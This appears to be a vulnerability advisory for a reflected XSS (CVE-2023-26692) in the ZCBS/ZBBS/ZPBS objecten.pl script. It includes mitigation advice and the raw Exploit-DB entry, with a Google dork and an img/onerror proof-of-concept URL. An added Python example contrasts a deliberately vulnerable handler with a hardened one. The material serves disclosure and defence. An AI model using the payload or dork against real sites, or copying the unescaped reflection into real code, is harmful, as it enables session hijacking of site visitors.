Vendor: ZCBS/ZBBS/ZPBS
By: Abdulaziz Saad
CVSS: 6.1 (MEDIUM)
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)
Product Name: ZCBS/ZBBS/ZPBS
Affected Version From: 4.14k
Affected Version To: 4.14k
Patch Exists: YES
CVE: CVE-2023-26692
CPE: a:zcbs:zcbs:4.14k
Platforms Tested: LAMP, Ubuntu
Year: 2023

ZCBS/ZBBS/ZPBS v4.14k – Reflected Cross-Site Scripting (XSS)

The 'ident' query-string parameter handled by the objecten.pl CGI script is written into the HTML response without validation or encoding. A remote, unauthenticated attacker who gets a victim to open a crafted link can inject arbitrary HTML and JavaScript that executes in the victim's browser within the origin of the vulnerable site, where it can read the page's DOM and issue requests with the victim's session. The victim has to follow the link, which is the user-interaction requirement behind the medium (6.1) CVSS rating.

Mitigation:

Treat 'ident' as untrusted: validate it against the format an object identifier is expected to have and reject anything else, and HTML-entity-encode it wherever it is written into the page. Validation alone is not sufficient if the value is later reflected into a different context (an attribute, a script block, a URL), so output encoding for the target context is the control that actually closes the hole. A Content-Security-Policy that disallows inline script limits what an injected payload can do. The vendor has published a fix (see 'Patch Exists' above); applying it is the definitive remedy.

Exploit-DB raw data:

# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=

---

[#] Vulnerability :

`$_GET['ident']`


[#] Exploitation :

`https://localhost/cgi-bin/objecten.pl?ident=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E`
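Added example, not the vendor's code and not part of the Exploit-DB entry: a Python stand-in for the vulnerable CGI pattern (objecten.pl itself is a Perl script; the handler, page layout and identifier format below are assumptions) next to a hardened version, plus a check that feeds the PoC value through both. The PoC is embedded in the quoted-printable form in which raw Exploit-DB entries are often archived (`=3D` standing for `=`, a bare `=` at end of line marking a soft line break) and decoded first, since that encoding is what produces the `ident=3D` sequences seen in some copies of this entry.

```python
import html
import quopri
import re
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the two PoC lines as they appear in quoted-printable
# exports of the Exploit-DB entry: "=3D" encodes "=", and a bare "=" at the
# end of a line is a soft line break. Decoding recovers the real URL.
RAW_POC_QP = (
    b"https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=\n"
    b"=3Dalert(%22XSS%22)%3E"
)

# Allowlist for a hypothetical object identifier. Assumption: the real
# application's ident format is not documented on this page.
IDENT_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def decode_poc_url(raw_qp: bytes = RAW_POC_QP) -> str:
    """Undo the quoted-printable layer to get the URL the author submitted."""
    return quopri.decodestring(raw_qp).decode("ascii")


def ident_from_url(url: str) -> str:
    """Return the percent-decoded 'ident' value, as the CGI script sees it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("ident", [""])[0]


def vulnerable_page(ident: str) -> str:
    """Hypothetical stand-in for the flawed pattern: the parameter is
    written straight into the HTML body. Not the vendor's objecten.pl."""
    return f"<html><body><h1>Object {ident}</h1></body></html>"


def hardened_page(ident: str) -> str:
    """Same page with two independent controls: reject anything that is
    not shaped like an identifier, and entity-encode on output anyway,
    so a later change to the allowlist cannot silently reopen the hole."""
    if not IDENT_RE.fullmatch(ident):
        return "<html><body><h1>Invalid object identifier</h1></body></html>"
    return f"<html><body><h1>Object {html.escape(ident, quote=True)}</h1></body></html>"


def reflects_markup(ident: str, body: str) -> bool:
    """True when the submitted value lands in the response with its '<'
    intact, i.e. the browser will parse it as markup rather than text.
    An encoded reflection ('&lt;img ...') is harmless and returns False."""
    return "<" in ident and ident in body


def check_poc(url: str = "") -> dict:
    """Run the PoC value through both handlers and report the outcome."""
    url = url or decode_poc_url()
    ident = ident_from_url(url)
    return {
        "ident": ident,
        "vulnerable": reflects_markup(ident, vulnerable_page(ident)),
        "hardened": reflects_markup(ident, hardened_page(ident)),
    }


if __name__ == "__main__":
    print(decode_poc_url())
    for key, value in check_poc().items():
        print(f"{key}: {value}")
```

Running the module prints the decoded PoC URL and the verdict for each handler. `reflects_markup` deliberately requires an intact `<`, because a scanner that only checks whether the input string came back would flag the hardened page too once the allowlist is loosened, even though the entity-encoded reflection is not exploitable.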